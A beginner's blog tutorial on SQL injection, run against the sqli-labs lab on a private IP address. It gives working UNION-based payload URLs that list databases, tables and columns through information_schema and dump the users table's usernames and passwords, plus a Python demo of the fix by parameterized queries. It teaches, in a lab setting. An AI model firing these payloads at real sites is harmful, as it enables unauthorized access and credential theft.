Beginner's Guide to SQL Injection (Basics Part 2)
Hello guys, I am back with the second part of my article, Beginner's Guide to SQL Injection.
I hope you enjoyed the first part and understood the basics of SQL Injection. If you have not read it yet, this article will be a little difficult to follow, so I request you to read Part-1 first from this link before reading this.
While concluding Part-1 I asked you to read about "information_schema", "table_schema" and the "LIMIT clause".
If you have read about them, very good; for those who were unable to, I'll explain them again here in short.
INFORMATION_SCHEMA
In simple words, you can think of information_schema as a "MASTER DATABASE" that holds details about all the other databases on the server, such as the names and types of tables, columns and users.
information_schema has many tables (see screenshot).
But we'll be using only these (see screenshot below) tables of information_schema most of the time to dump a database. You can use other tables as well if you want to extract other information, so which table to use depends entirely on the QUERY you are forming.
To access the tables of information_schema we'll use the . (dot) operator.
Example
To access COLUMNS: information_schema.COLUMNS
To access TABLES: information_schema.TABLES
To access SCHEMATA: information_schema.SCHEMATA
In the first part we were able to get the database name and the version of the database using the select query
"SELECT 1,database(),version()" (see screenshot)
Now we'll dump the real database.
We know that the database we are in is "SECURITY".
AIM-1 -- To find out all the DATABASES on the server. (Very critical)
Information about all the databases will be present in the SCHEMATA table of the information_schema.
Let’s first see the terminal output
From the screenshot we know we are concerned with the column "SCHEMA_NAME".
So the query will be
SELECT schema_name from Information_schema.SCHEMATA;
Question – Here we have access to the backend database, so we figured out that the column "SCHEMA_NAME" contains the names of the databases. But in a real scenario, how will we figure this out?
Answer – This depends on the type and version of the database. For a MySQL database it will always be the same.
Let's try to extract the same information using SQL Injection.
In article 1 we figured out that the results of column 2 and column 3 were displayed on the UI, so we'll build our query so that it is syntactically correct with the UNION operator and our desired output appears on the UI as well.
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, schema_name,3 from information_schema.schemata --+
See screenshot below
Question – Using the above query we get only one (the first in the list) schema name. How do we get the other schema names as well?
Answer – There are two ways to get all the schema names:
a) Using the LIMIT clause
b) Using the group_concat() function
I'll show you how to use both here, but in future I'll mainly use the group_concat() function because it saves time and you get all the values at once.
a) Using the LIMIT clause
Finding the 2nd schema_name using the LIMIT clause
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, schema_name,3 from information_schema.schemata LIMIT 1,1--+
Finding the 3rd schema_name using the LIMIT clause
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, schema_name,3 from information_schema.schemata LIMIT 2,1--+
Similarly, keep increasing the offset in the LIMIT clause to get the remaining schema names.
b) Using the group_concat() function
With group_concat() we get all the schema names at once; there is no need to iterate the offset as we did with the LIMIT clause.
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(schema_name),3 from information_schema.schemata --+
See screenshot below
AIM-2 -- To find out all the TABLES in the DATABASE
a) To find out all the tables of the DATABASE “SECURITY”
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
So there are 4 tables in the database "SECURITY":
Table 1 – emails
Table 2 – referers
Table 3 – uagents
Table 4 – users
(Table 4 "USERS" looks interesting; maybe we will get important information from this table.)
b) To find out all the tables of the DATABASE "bWAPP"
(Note – You may not have the bWAPP database on your server, so you can use another database that is present on yours. Sometimes you will not be able to extract information from any database other than the one associated with the application in which you are exploiting the SQL injection.)
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema='bWAPP'--+
From now on I’ll deal with only “SECURITY” database.
AIM-3 -- To find out all the COLUMNS of all the tables in the DATABASE “SECURITY”
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_schema='security' --+
(If you do not use the where clause to specify table_schema='security', the command will give you all the columns in information_schema.columns, meaning you will get all the columns of all the tables of all the databases present on the server.) → TRY THIS BY YOURSELF
AIM-4 -- To find out all the COLUMNS of a particular table (here users) of the DATABASE “SECURITY”
It's simple: you only need to add one more condition to the where clause, specifying table_name with the AND operator.
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
Now we know the USERS table of the DATABASE "SECURITY" has 3 columns:
Column 1 – id
Column 2 – username
Column 3 – password
(A table named "USERS" can be present in more than one database, so if you do not specify table_schema='security' in the above command, you will get the column names of all the tables named "USERS" from the different databases.)
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name='users'--+
Now see the screenshot below to understand why the above command gives so many column names.
This screenshot shows that my server has a table named "USERS" in 4 databases, so the above command displays the column names of all 4 of these tables.
AIM-5 -- To find out all the values of columns “username” and “password” of the table having table name “USERS”
Now that we know the names of the tables and columns, there is no need to take the help of information_schema.
(We are already in the "SECURITY" database because the application (DHAKKAN LAB) interacts with the database "SECURITY".)
Here we'll use a simple command:
SELECT username, password from users;
To get all usernames and passwords we'll use the group_concat() function:
SELECT group_concat(username), group_concat(password) from users;
OR
SELECT group_concat(username), group_concat(password) from security.users;
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(username), group_concat(password) from users--+
OR
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(username), group_concat(password) from security.users--+
Similarly, you can extract column values from the "USERS" table of another database by simply adding the database name just before the table name, like this → bWAPP.users
But first you have to find out the column names present in the "USERS" table of that other database.
http://172.22.45.162/sqli/Less-1/?id=-1' union select 1, group_concat(login), group_concat(password) from bWAPP.users--+
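The AIM-5 lookup above can be reproduced, and then closed off, in a few lines. The following is an added example (not the author's or the lab's code): it uses Python's sqlite3 as a stand-in for the lab's MySQL "security" database with constructed rows, assumes the lab's lookup has the shape SELECT ... WHERE id='<input>' LIMIT 0,1, and runs the article's group_concat payload first against a string-built query and then against the same query with a bound parameter.

```python
import sqlite3

# Constructed stand-in for the lab's "security" database: a "users" table with
# the three columns the article enumerated (id, username, password). The rows
# are made up for this example.
SAMPLE_ROWS = [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "letmein")]

# The article's AIM-5 payload as the application receives it after URL decoding
# ('--+' in the URL arrives as '-- ', a comment that swallows the rest of the query).
PAYLOAD = "-1' union select 1, group_concat(username), group_concat(password) from users-- "


def make_db():
    """Build the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Assumed shape of the lab's query: the id is pasted into the SQL text,
    so a closing quote followed by UNION changes the statement itself."""
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the id travels as a bound parameter, never as SQL text,
    so the same payload is only a value that matches no row."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    """Return (normal lookup, what the payload leaks, what the fixed query returns)."""
    conn = make_db()
    return (
        lookup_vulnerable(conn, "1"),
        lookup_vulnerable(conn, PAYLOAD),     # one row: 1, all usernames, all passwords
        lookup_parameterized(conn, PAYLOAD),  # []
    )


if __name__ == "__main__":
    for label, rows in zip(("normal", "leaked", "parameterized"), demo()):
        print(label, rows)
```

The same fix applies to the MySQL queries shown above: with mysqli or PDO prepared statements the id is bound as a value, so neither the UNION nor the information_schema reads in this article are ever parsed as SQL.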
NOTE – PLEASE DON'T TRY THIS ON ANY LIVE SITE FOR WHICH YOU DON'T HAVE PERMISSION. LOGS ARE GENERATED AND MONITORED; YOU MAY CREATE TROUBLE FOR YOURSELF. (I have seen guys who literally ruined their own careers and are now busy dealing with legal actions taken against them.)
Use this knowledge to help organizations secure their websites from the bad guys.
You can legally earn a lot in an information security career by using your knowledge to secure the cyber world.
You can contact me here
Author – Rinkish Khera
Rinkish Khera is a Web Application security consultant who loves competitive coding, hacking and learning new things about technology.
Another good article!
Thanks a lot.
I had to struggle for one whole day and then your blog came to the rescue! Covers all the basics and kudos for updating sqli labs for those with php compatibility issues. Great work :)